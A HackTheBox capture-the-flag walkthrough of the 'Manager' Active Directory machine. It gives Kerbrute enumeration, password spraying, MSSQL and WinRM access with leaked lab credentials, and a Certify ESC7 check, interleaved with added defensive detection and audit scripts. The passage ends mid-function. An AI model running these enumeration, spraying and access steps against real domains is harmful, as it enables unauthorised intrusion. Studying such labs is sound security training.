Manager – HackTheBox

  • OS: Windows
  • Difficulty: Medium
  • Platform: HackTheBox



User

The Nmap scan shows several open ports, among them: 80 HTTP, 88 Kerberos, 135 Microsoft RPC, 389 Lightweight Directory Access Protocol (LDAP), 445 Server Message Block (SMB), 1433 Microsoft SQL Server (MSSQL), 5985 Windows Remote Management (WinRM) and more…

❯ sudo nmap -sVC -p53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49669,49670,49671,49731,63231,63253,63296 10.10.11.236 -oN targeted

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-11 21:14 -03
Nmap scan report for 10.10.11.236
Host is up (0.27s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-12 07:14:27Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-12T07:16:02+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-12T07:16:03+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
1433/tcp  open     ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
|   10.10.11.236:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info:
|   10.10.11.236:1433:
|     Target_Name: MANAGER
|     NetBIOS_Domain_Name: MANAGER
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: manager.htb
|     DNS_Computer_Name: dc01.manager.htb
|     DNS_Tree_Name: manager.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-12T07:04:01
|_Not valid after:  2054-03-12T07:04:01
|_ssl-date: 2024-03-12T07:16:02+00:00; +7h00m00s from scanner time.
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-12T07:16:02+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
3269/tcp  open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-12T07:16:03+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after:  2024-07-29T13:51:28
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     mc-nmf        .NET Message Framing
49667/tcp open     msrpc         Microsoft Windows RPC
49669/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open     msrpc         Microsoft Windows RPC
49671/tcp open     msrpc         Microsoft Windows RPC
49731/tcp open     msrpc         Microsoft Windows RPC
63231/tcp filtered unknown
63253/tcp open     msrpc         Microsoft Windows RPC
63296/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
|   date: 2024-03-12T07:15:22
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.46 seconds

Visiting the HTTP website we get the following page:

Website view

I explore it and try a few things, but I find nothing interesting.

Next, I use NetExec (the successor of CrackMapExec) to start gathering information from the SMB service:

❯ netexec smb 10.10.11.236

SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)

so we have a machine named DC01 and a domain, manager.htb.

I decide to add the line 10.10.11.236 manager.htb to my /etc/hosts file for later use:

❯ echo '10.10.11.236 manager.htb' | sudo tee -a /etc/hosts

I will also use enum4linux-ng (which is enum4linux rewritten in Python instead of Perl, and which can be downloaded from its GitHub repository) to try to obtain additional information:

❯ python3 /home/gunzf0x/GitStuff/enum4linux-ng/enum4linux-ng.py 10.10.11.236

ENUM4LINUX - next generation

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.10.11.236
[*] Username ......... ''
[*] Random Username .. 'dimuwiga'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

<SNIP>
 ===========================================================
|    Domain Information via SMB session for 10.10.11.236    |
 ===========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DC01
NetBIOS domain name: MANAGER
DNS domain: manager.htb
FQDN: dc01.manager.htb
Derived membership: domain member
Derived domain: MANAGER

 =========================================
|    RPC Session Check on 10.10.11.236    |
 =========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[+] Server allows session using username 'dimuwiga', password ''
[H] Rerunning enumeration with user 'dimuwiga' might give more results

 <SNIP>

 =========================================
|    Printers via RPC for 10.10.11.236    |
 =========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED

Completed after 33.12 seconds

but I cannot see any new information beyond what NetExec had already found about the domain.

Given that there is a Kerberos service and the NetExec result, I suspect we are dealing with an Active Directory environment.

Since we cannot enumerate users through Microsoft RPC (anonymous login with rpcclient is not possible), I will try to obtain them with Kerbrute and a wordlist of common usernames from SecLists:

❯ kerbrute userenum -d manager.htb --dc 10.10.11.236 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 50

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/11/24 - Ronnie Flathers @ropnop

2024/03/11 21:34:32 >  Using KDC(s):
2024/03/11 21:34:32 >   10.10.11.236:88

2024/03/11 21:34:33 >  [+] VALID USERNAME:       ryan@manager.htb
2024/03/11 21:34:34 >  [+] VALID USERNAME:       guest@manager.htb
2024/03/11 21:34:35 >  [+] VALID USERNAME:       cheng@manager.htb
2024/03/11 21:34:35 >  [+] VALID USERNAME:       raven@manager.htb
2024/03/11 21:34:39 >  [+] VALID USERNAME:       administrator@manager.htb
2024/03/11 21:34:45 >  [+] VALID USERNAME:       Ryan@manager.htb
2024/03/11 21:34:46 >  [+] VALID USERNAME:       Raven@manager.htb
2024/03/11 21:34:49 >  [+] VALID USERNAME:       operator@manager.htb
2024/03/11 21:35:19 >  [+] VALID USERNAME:       Guest@manager.htb
2024/03/11 21:35:19 >  [+] VALID USERNAME:       Administrator@manager.htb
2024/03/11 21:35:42 >  [+] VALID USERNAME:       Cheng@manager.htb
2024/03/11 21:36:49 >  [+] VALID USERNAME:       jinwoo@manager.htb
2024/03/11 21:37:01 >  [+] VALID USERNAME:       RYAN@manager.htb
2024/03/11 21:37:40 >  [+] VALID USERNAME:       RAVEN@manager.htb
2024/03/11 21:37:42 >  [+] VALID USERNAME:       GUEST@manager.htb
2024/03/11 21:38:46 >  [+] VALID USERNAME:       Operator@manager.htb
2024/03/11 21:45:51 >  [+] VALID USERNAME:       OPERATOR@manager.htb
<SNIP>

As we can see, we found users, which I save to a file:

❯ cat users.txt

ryan
operator
guest
cheng
raven
administrator
jinwoo

Next, I try a simple Password Spray with username:username credentials using NetExec:

❯ netexec smb 10.10.11.236 -u users.txt -p users.txt --continue-on-success

SMB         10.10.11.236    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.236    445    DC01             [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE
SMB         10.10.11.236    445    DC01             [-] manager.htb\operator:ryan STATUS_LOGON_FAILURE
SMB         10.10.11.236    445    DC01             [-] manager.htb\guest:ryan STATUS_LOGON_FAILURE
SMB         10.10.11.236    445    DC01             [-] manager.htb\cheng:ryan STATUS_LOGON_FAILURE
SMB         10.10.11.236    445    DC01             [-] manager.htb\raven:ryan STATUS_LOGON_FAILURE
SMB         10.10.11.236    445    DC01             [-] manager.htb\administrator:ryan STATUS_LOGON_FAILURE
SMB         10.10.11.236    445    DC01             [-] manager.htb\jinwoo:ryan STATUS_LOGON_FAILURE
SMB         10.10.11.236    445    DC01             [-] manager.htb\ryan:operator STATUS_LOGON_FAILURE
SMB         10.10.11.236    445    DC01             [+] manager.htb\operator:operator
SMB         10.10.11.236    445    DC01             [-] manager.htb\guest:operator STATUS_LOGON_FAILURE
<SNIP>

so we find a valid set of credentials: operator:operator
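From the defender's side, the Kerbrute enumeration and the username:username spray above leave two distinct patterns in the domain controller's Security log: a burst of AS-REQs for non-existent principals (event 4768, result 0x6) and one NTLM logon failure per account (event 4625, status 0xC000006D) from the same client. The following detection logic is an added example, not part of the original writeup; the events, the attacker address 10.10.14.5 and the workstation 10.10.11.50 are constructed samples.

```python
"""Detect Kerberos username enumeration and password spraying from
Windows Security events 4768 / 4625 (constructed sample data)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, not real logs.  Field names mirror the
# Security log: 4768 "Result Code" and 4625 "Status".
#   0x6        KDC_ERR_C_PRINCIPAL_UNKNOWN -> account does not exist
#   0x19       KDC_ERR_PREAUTH_REQUIRED    -> account exists (kerbrute's VALID USERNAME)
#   0xC000006D STATUS_LOGON_FAILURE        -> wrong password over NTLM/SMB
ATTACKER, WORKSTATION = "10.10.14.5", "10.10.11.50"   # constructed addresses
T0 = datetime(2024, 3, 11, 21, 34)
DOMAIN_USERS = ["ryan", "operator", "guest", "cheng", "raven", "administrator", "jinwoo"]
GUESSED = [f"wordlist{i}" for i in range(30)]        # names that do not exist


def _ev(eid, code, account, src, seconds):
    return {"id": eid, "code": code, "account": account, "src": src,
            "ts": T0 + timedelta(seconds=seconds)}


SAMPLE_EVENTS = (
    [_ev(4768, "0x6", n, ATTACKER, i) for i, n in enumerate(GUESSED)]
    + [_ev(4768, "0x19", u, ATTACKER, 40 + i) for i, u in enumerate(DOMAIN_USERS)]
    + [_ev(4625, "0xC000006D", u, ATTACKER, 600 + i) for i, u in enumerate(DOMAIN_USERS)]
    + [_ev(4625, "0xC000006D", "cheng", WORKSTATION, 700 + i) for i in range(3)]  # typos
)


def _bursting_sources(events, window, min_distinct):
    """Return {source: peak} for sources that touched at least `min_distinct`
    different accounts inside any span no longer than `window`."""
    by_src = defaultdict(list)
    for ev in events:
        by_src[ev["src"]].append((ev["ts"], ev["account"].lower()))
    hits = {}
    for src, items in by_src.items():
        items.sort()
        peak, start = 0, 0
        for end in range(len(items)):
            while items[end][0] - items[start][0] > window:
                start += 1
            peak = max(peak, len({acct for _, acct in items[start:end + 1]}))
        if peak >= min_distinct:
            hits[src] = peak
    return hits


def detect_user_enumeration(events, window=timedelta(minutes=5), min_distinct=10):
    """kerbrute sends AS-REQs without pre-authentication; every name that does
    not exist yields a 4768 with result 0x6 from the same client address."""
    unknown = [e for e in events if e["id"] == 4768 and e["code"] == "0x6"]
    return _bursting_sources(unknown, window, min_distinct)


def detect_password_spray(events, window=timedelta(minutes=5), min_distinct=5):
    """A spray fails once per account rather than many times per account, so
    count distinct accounts per source instead of total failures."""
    failed = [e for e in events if e["id"] == 4625 and e["code"] == "0xC000006D"]
    return _bursting_sources(failed, window, min_distinct)


def accounts_confirmed_to_attacker(events, src):
    """Existing accounts a source learned about (0x19 answers): the list a
    defender should expect to see sprayed next."""
    return sorted({e["account"] for e in events
                   if e["src"] == src and e["id"] == 4768 and e["code"] == "0x19"})


if __name__ == "__main__":
    print("enumeration:", detect_user_enumeration(SAMPLE_EVENTS))
    print("spray:", detect_password_spray(SAMPLE_EVENTS))
    print("confirmed:", accounts_confirmed_to_attacker(SAMPLE_EVENTS, ATTACKER))
```

The thresholds are deliberately low for the sample; tune them against the normal failure rate of your own domain before alerting on them.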

Now that I have a user, I use rpcclient to list the users in the domain:

❯ rpcclient -U 'operator%operator' 10.10.11.236 -c 'enumdomusers' | awk '{print $1}' | awk -F ':' '{print $2}' | tr -d "[]"

Administrator
Guest
krbtgt
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator

and, just in case, I save them to a file for later.

Also using NetExec, I check whether these credentials are valid for any other service running on the machine. They are: this credential is reused for the Microsoft SQL Server (MSSQL) service:

❯ netexec mssql 10.10.11.236 -u 'operator' -p 'operator'

MSSQL       10.10.11.236    1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL       10.10.11.236    1433   DC01             [+] manager.htb\operator:operator

and I see that the credentials operator:operator also work for this service.

Now I use impacket-mssqlclient from the Impacket library with this credential:

❯ impacket-mssqlclient manager.htb/operator:'operator'@10.10.11.236
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'operator'.

and it does not work. But if I add the -windows-auth flag, it does:

❯ impacket-mssqlclient manager.htb/operator:'operator'@10.10.11.236 -windows-auth

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator  guest@master)>

I try to execute commands with xp_cmdshell, but I cannot. I am also not allowed to "enable" the options needed to run xp_cmdshell:

<SNIP>
SQL (MANAGER\Operator  guest@master)> xp_cmdshell whoami
[-] ERROR(DC01\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (MANAGER\Operator  guest@master)> enable_xp_cmdshell
[-] ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (MANAGER\Operator  guest@master)>

After playing with some parameters (and after following some instructions from the HackTricks Pentesting MSSQL page) I find something curious. Since there is an HTTP service/server, there may be a directory located at C:\inetpub\wwwroot:

<SNIP>
SQL (MANAGER\Operator  guest@master)> EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;
subdirectory                      depth   file
-------------------------------   -----   ----
about.html                            1      1
contact.html                          1      1
css                                   1      0
images                                1      0
index.html                            1      1
js                                    1      0
service.html                          1      1
web.config                            1      1
website-backup-27-07-23-old.zip       1      1

Apparently, these files are publicly served by the website over HTTP. I also notice a rather unusual and curious file: website-backup-27-07-23-old.zip

So I download the file with wget:

❯ wget http://10.10.11.236/website-backup-27-07-23-old.zip

--2024-03-11 22:15:14--  http://10.10.11.236/website-backup-27-07-23-old.zip
Connecting to 10.10.11.236:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’

website-backup-27-07-23-old.zip            100%[=======================================================================================>]   1021K   518KB/s    in 2.0s

2024-03-11 22:15:16 (518 KB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]

I move the downloaded file into a new directory and unzip/extract the files contained in it:

❯ mkdir backup_found

❯ mv website-backup-27-07-23-old.zip backup_found

❯ cd backup_found

❯ unzip website-backup-27-07-23-old.zip

Archive:  website-backup-27-07-23-old.zip
  inflating: .old-conf.xml
  inflating: about.html
  inflating: contact.html
  inflating: css/bootstrap.css
  inflating: css/responsive.css
  inflating: css/style.css
  inflating: css/style.css.map
  inflating: css/style.scss
  inflating: images/about-img.png
  inflating: images/body_bg.jpg
 extracting: images/call.png
 extracting: images/call-o.png
  inflating: images/client.jpg
  inflating: images/contact-img.jpg
 extracting: images/envelope.png
 extracting: images/envelope-o.png
  inflating: images/hero-bg.jpg
 extracting: images/location.png
 extracting: images/location-o.png
 extracting: images/logo.png
  inflating: images/menu.png
 extracting: images/next.png
 extracting: images/next-white.png
  inflating: images/offer-img.jpg
  inflating: images/prev.png
 extracting: images/prev-white.png
 extracting: images/quote.png
 extracting: images/s-1.png
 extracting: images/s-2.png
 extracting: images/s-3.png
 extracting: images/s-4.png
 extracting: images/search-icon.png
  inflating: index.html
  inflating: js/bootstrap.js
  inflating: js/jquery-3.4.1.min.js
  inflating: service.html

Among these files I can see one named .old-conf.xml:

❯ ls -la

total 1092
drwxr-xr-x 5 gunzf0x gunzf0x    4096 Mar 11 22:18 .
drwxr-xr-x 3 gunzf0x gunzf0x    4096 Mar 11 22:18 ..
-rw-r--r-- 1 gunzf0x gunzf0x    5386 Jul 27  2023 about.html
-rw-r--r-- 1 gunzf0x gunzf0x    5317 Jul 27  2023 contact.html
drwxr-xr-x 2 gunzf0x gunzf0x    4096 Mar 11 22:18 css
drwxr-xr-x 2 gunzf0x gunzf0x    4096 Mar 11 22:18 images
-rw-r--r-- 1 gunzf0x gunzf0x   18203 Jul 27  2023 index.html
drwxr-xr-x 2 gunzf0x gunzf0x    4096 Mar 11 22:18 js
-rw-r--r-- 1 gunzf0x gunzf0x     698 Jul 27  2023 .old-conf.xml
-rw-r--r-- 1 gunzf0x gunzf0x    7900 Jul 27  2023 service.html
-rw-r--r-- 1 gunzf0x gunzf0x 1045328 Jul 27  2023 website-backup-27-07-23-old.zip

which, if we read it, contains credentials:

<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
         <user>raven@manager.htb</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
   </server>
   <search type="full">
      <dir-list>
         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
   </search>
</ldap-conf>

so we find a credential: raven:R4v3nBe5tD3veloP3r!123. I notice that the user raven had already been found by the Kerbrute scan and by the rpcclient enumdomusers command, so this user should exist on the target machine.
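The root cause here is a backup archive left in the webroot with a hidden config file carrying a plaintext LDAP password. The audit below, an added example not taken from the writeup, walks a webroot the way a crawler would and reports exposed archives plus any config member (loose or inside a zip) with credential-looking fields; the sample webroot, the host dc01.example.test and the placeholder password are constructed.

```python
"""Audit a webroot for backup archives and config files that leak secrets
(the website-backup-27-07-23-old.zip / .old-conf.xml failure above)."""
import re
import tempfile
import zipfile
import xml.etree.ElementTree as ET
from pathlib import Path

ARCHIVE_EXT = {".zip", ".bak", ".old", ".7z", ".rar", ".tar", ".gz", ".tgz"}
CONFIG_EXT = {".xml", ".config", ".json", ".ini", ".env", ".yml", ".yaml"}
SECRET_RE = re.compile(r"password|passwd|pwd|secret|connectionstring|apikey", re.I)

# Constructed config shaped like the leaked .old-conf.xml (placeholder secret).
SAMPLE_CONF = b"""<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf>
  <server>
    <host>dc01.example.test</host>
    <access-user>
      <user>svc-ldap@example.test</user>
      <password>PLACEHOLDER-NOT-A-REAL-SECRET</password>
    </access-user>
  </server>
</ldap-conf>"""


def secret_fields(data: bytes):
    """Names of XML elements/attributes that look like secrets and carry a
    value; non-XML content falls back to a keyword scan of the text."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return sorted({m.lower() for m in SECRET_RE.findall(data.decode("utf-8", "replace"))})
    hits = set()
    for el in root.iter():
        if SECRET_RE.search(el.tag) and (el.text or "").strip():
            hits.add(el.tag)
        hits.update(a for a in el.attrib if SECRET_RE.search(a))
    return sorted(hits)


def audit_webroot(root):
    """Return (kind, location, fields) findings: exposed archives, hidden or
    backup files, and secret-bearing configs loose or inside zip archives."""
    root = Path(root)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        suffix = path.suffix.lower()
        if suffix == ".zip" and zipfile.is_zipfile(path):
            findings.append(("exposed-archive", rel, []))
            with zipfile.ZipFile(path) as zf:
                for member in zf.namelist():
                    if Path(member).suffix.lower() in CONFIG_EXT:
                        fields = secret_fields(zf.read(member))
                        if fields:
                            findings.append(("secret-in-archive", f"{rel}:{member}", fields))
            continue
        if suffix in CONFIG_EXT:
            fields = secret_fields(path.read_bytes())
            if fields:
                findings.append(("secret-in-file", rel, fields))
        if suffix in ARCHIVE_EXT or "backup" in path.name.lower() or path.name.startswith("."):
            findings.append(("exposed-backup-file", rel, []))
    return findings


def build_sample_webroot():
    """Throwaway directory shaped like the wwwroot listing in the writeup."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    for name in ("index.html", "about.html", "contact.html", "service.html"):
        (root / name).write_text("<html></html>")
    (root / "css").mkdir()
    (root / "css" / "style.css").write_text("body{}")
    (root / "web.config").write_bytes(b"<configuration><system.webServer/></configuration>")
    with zipfile.ZipFile(root / "website-backup-27-07-23-old.zip", "w") as zf:
        zf.writestr(".old-conf.xml", SAMPLE_CONF)   # hidden config inside the backup
        zf.writestr("index.html", "<html></html>")
    return root


if __name__ == "__main__":
    for kind, where, fields in audit_webroot(build_sample_webroot()):
        print(f"{kind:22} {where} {fields}")
```

Run it against a copy of the real webroot on a schedule; on IIS the same check belongs in the build pipeline that publishes the site, since the server happily serves anything under wwwroot that request filtering does not block.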

I check whether I can connect to the target machine via WinRM with this credential:

❯ netexec winrm 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123'

WINRM       10.10.11.236    5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM       10.10.11.236    5985   DC01             [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)

and, since the credentials are valid, I connect to the target machine using evil-winrm:

❯ evil-winrm -i 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents>

We can get the user flag on Raven's Desktop.

NT Authority/System - Administrator

I check my groups as Raven on the target machine, but there is nothing interesting:

*Evil-WinRM* PS C:\Users\Raven\Documents> net user Raven
User name                    Raven
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            7/27/2023 8:23:10 AM
Password expires             Never
Password changeable          7/28/2023 8:23:10 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   3/12/2024 1:19:39 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

After looking for vulnerabilities and services running on the system, I do not find anything very interesting. So I decide to check the certificates that may exist on this machine. For this I use a Certify.exe binary (which can be downloaded from its GitHub repository) and upload it to the machine with evil-winrm. We do this to check whether Active Directory Certificate Services (ADCS) is running on the machine:

*Evil-WinRM* PS C:\Users\Raven\Documents> upload ../exploits/Certify.exe

Info: Uploading /home/gunzf0x/HTB/HTBMachines/Medium/Manager/content/../exploits/Certify.exe to C:\Users\Raven\Documents\Certify.exe

Data: 232104 bytes of 232104 bytes copied

and run it:

*Evil-WinRM* PS C:\Users\Raven\Documents> .\Certify.exe find -vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=manager,DC=htb'

[*] Listing info about the Enterprise CA 'manager-DC01-CA'

    Enterprise CA Name            : manager-DC01-CA
    DNS Hostname                  : dc01.manager.htb
    FullName                      : dc01.manager.htb\manager-DC01-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=manager-DC01-CA, DC=manager, DC=htb
    Cert Thumbprint               : ACE850A2892B1614526F7F2151EE76E752415023
    Cert Serial                   : 5150CE6EC048749448C7390A52F264BB
    Cert Start Date               : 7/27/2023 3:21:05 AM
    Cert End Date                 : 7/27/2122 3:31:04 AM
    Cert Chain                    : CN=manager-DC01-CA,DC=manager,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Deny   ManageCA, Read                             MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               MANAGER\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               MANAGER\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
      Allow  ManageCA, Enroll                           MANAGER\Raven                 S-1-5-21-4078382237-1492182817-2568127209-1116
      Allow  Enroll                                     MANAGER\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
    Enrollment Agent Restrictions : None
<SNIP>

I see that the user Raven has Allow ManageCA, so we can try to attack from this side.
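What makes this CA exposed is exactly the line above: a plain domain user holding ManageCA on the Enterprise CA. The script below, an added example and not part of the writeup or of Certify, parses the "Access Rights / Principal" table as Certify prints it (including the glued "Authenticated UsersS-1-5-11" line) and reports every non-administrative principal whose effective rights include ManageCA or ManageCertificates, honouring Deny entries. The sample text reuses the page's ACL lines plus two constructed lines for a hypothetical MANAGER\svc-web principal (RID 1200 is made up) to exercise the Deny logic.

```python
"""Flag ESC7 exposure in a Certify 'find' CA permissions block: non-admin
principals with ManageCA or ManageCertificates after Deny ACEs are applied."""
import re

# Rights that let a principal reconfigure the CA or approve pending requests.
DANGEROUS_RIGHTS = {"ManageCA", "ManageCertificates"}
# Principals expected to hold them: BUILTIN\Administrators (well-known SID)
# and the Domain Admins / Enterprise Admins groups (well-known RIDs).
PRIVILEGED_SIDS = {"S-1-5-32-544"}
PRIVILEGED_RIDS = {"512", "519"}

# Allow|Deny, rights (comma list), principal, SID; anchoring on the SID at end
# of line copes with Certify printing no space before a long principal's SID.
ACE_RE = re.compile(r"^\s*(Allow|Deny)\s+(.+?)\s{2,}(.+?)\s*(S-1-5(?:-\d+)+)\s*$")

# Constructed sample: the page's CA ACL plus two made-up svc-web lines.
SAMPLE_CERTIFY_OUTPUT = """\
      Access Rights                                     Principal

      Deny   ManageCA, Read                             MANAGER\\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
      Allow  Enroll                                     NT AUTHORITY\\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               MANAGER\\Domain Admins         S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               MANAGER\\Enterprise Admins     S-1-5-21-4078382237-1492182817-2568127209-519
      Allow  ManageCA, Enroll                           MANAGER\\Raven                 S-1-5-21-4078382237-1492182817-2568127209-1116
      Allow  Enroll                                     MANAGER\\Operator              S-1-5-21-4078382237-1492182817-2568127209-1119
      Allow  ManageCertificates                         MANAGER\\svc-web               S-1-5-21-4078382237-1492182817-2568127209-1200
      Deny   ManageCertificates                         MANAGER\\svc-web               S-1-5-21-4078382237-1492182817-2568127209-1200
"""


def parse_ca_acl(text):
    """Turn Certify's ACL lines into dicts with type, rights set, principal, SID."""
    aces = []
    for line in text.splitlines():
        m = ACE_RE.match(line)
        if m:
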